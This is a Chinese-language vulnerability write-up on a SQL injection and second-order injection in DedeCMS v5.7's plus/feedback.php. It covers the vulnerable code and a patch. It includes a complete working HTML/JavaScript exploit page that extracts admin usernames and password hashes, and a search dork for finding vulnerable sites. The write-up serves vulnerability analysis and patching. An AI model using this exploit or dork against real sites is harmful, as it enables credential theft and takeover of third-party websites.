catalog
1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考
1. 漏洞描述
1. Dedecms v5.7的plus\feedback.php SQL没有正确验证用户提供的输入,在实现上中存在注入漏洞2. 攻击者可以利用DEDECMS的变量覆盖漏洞向数据库中注入WEBSHELL Payload3. 在另一个代码流,攻击者可以触发二次注入
Relevant Link:
/vuldb/ssvid-60549/NewsInfo/124/17697.Html/chengxuwenti/0504/47.html
2. 漏洞触发条件
0x1: POC
<html><head><title>DedeCms v5.7 feedback.php exp</title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><script language='javascript'>y = document.form1.addr.value;function exploit(){ var yanzhen = document.getElementById("yanzhen").value;var aid = document.getElementById("aid").value;var sqli = document.getElementById("sqli").value;document.form1.typeid.value = "0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'), ('" + aid +"','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',"+sqli+")#";document.form1.action = document.form1.addr.value + "/plus/feedback.php";document.form1.te.name = "action";document.form1.submit();}function getyanzhen(){var x = "<img src='"+ document.form1.addr.value +"/include/vdimgck.php' width='60' height='24' οnclick=\"this.src=this.src+'?'\">";document.body.innerHTML+=x;document.form1.addr.value = y;}function look(){window.location.href = document.form1.addr.value+"/plus/feedback.php?aid="+document.getElementById("aid").value;}</script></head><body>############################################################<br/>DedeCms v5.7 feedback.php $typeid SQLi<br/> Dork:inurl:plus/feedback.php?aid=<br/> ############################################################<br/><br/><form action="xxx" method="get" name="form1" target="_blank">程序URL:<input type="text" id="addr" value="http://" /><br/>验证码:<input type="text" name="validate" id="yanzhen" value=""/><br/>存在的Aid:<input type="text" id="aid" value="1"/><br/>SQL注入语句:<input type="text" id="sqli" value="(SELECT concat(uname,0x5f,pwd,0x5f) FROM `dede_admin`)" style="width:500px;"/><br/><input type="hidden" name="" id="te" value="send"/><input type="hidden" name="comtype" value="comments"/><input type="hidden" name="fid" value="1"/><input type="hidden" name="isconfirm" value="yes"/><input type="hidden" name="msg" value="90sec"/><input type="hidden" name="typeid" value=""/><input type="button" οnclick="getyanzhen();" value="获取验证码"><input type="button" onClick="exploit()" value="#Exploit#" /><input type="button" onClick="look()" value="查看结果" /><br/></form></body></html>
Relevant Link:
http://www.oday.pw/WEBanquan/111312.html
3. 漏洞影响范围
<= dedecms 5.7
4. 漏洞代码分析
\plus\feedback.php
..//保存评论内容if($comtype == 'comments'){$arctitle = addslashes($title);if($msg!=''){//$typeid变量未做初始化$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";$rs = $dsql->ExecuteNoneQuery($inquery);if(!$rs){ShowMsg(' 发表评论错误! ', '-1');//echo $dsql->GetError(); exit();}}}//引用回复elseif ($comtype == 'reply'){$row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");//未对数据库查询的$row['arctitle']进行有效过滤,造成二次注入$arctitle = $row['arctitle'];$aid =$row['aid'];$msg = $quotemsg.$msg;$msg = HtmlReplace($msg,2);$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";$dsql->ExecuteNoneQuery($inquery);}..
Relevant Link:
/a/security/web/jbst//1103/11816.html
5. 防御方法
\plus\feedback.php
//保存评论内容if($comtype == 'comments'){ $arctitle = addslashes($title);/* 增加规范化、过滤逻辑 */$typeid = intval($typeid);$ischeck = intval($ischeck);$feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);/**/if($msg!=''){//$typeid变量未做初始化$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";$rs = $dsql->ExecuteNoneQuery($inquery);if(!$rs){ShowMsg(' 发表评论错误! ', '-1');//echo $dsql->GetError();exit();}}}//引用回复elseif ($comtype == 'reply'){$row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");//未对数据库查询的$row['arctitle']进行有效过滤,造成二次注入$arctitle = $row['arctitle'];/* 增加转义逻辑 */$arctitle = addslashes($row['arctitle']);/* */$aid =$row['aid'];$msg = $quotemsg.$msg;$msg = HtmlReplace($msg,2);$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";$dsql->ExecuteNoneQuery($inquery);}
6. 攻防思考
Copyright (c) LittleHann All rights reserved
如果觉得《dedecms /plus/feedback.php SQL Injection Vul》对你有帮助,请点赞、收藏,并留下你的观点哦!
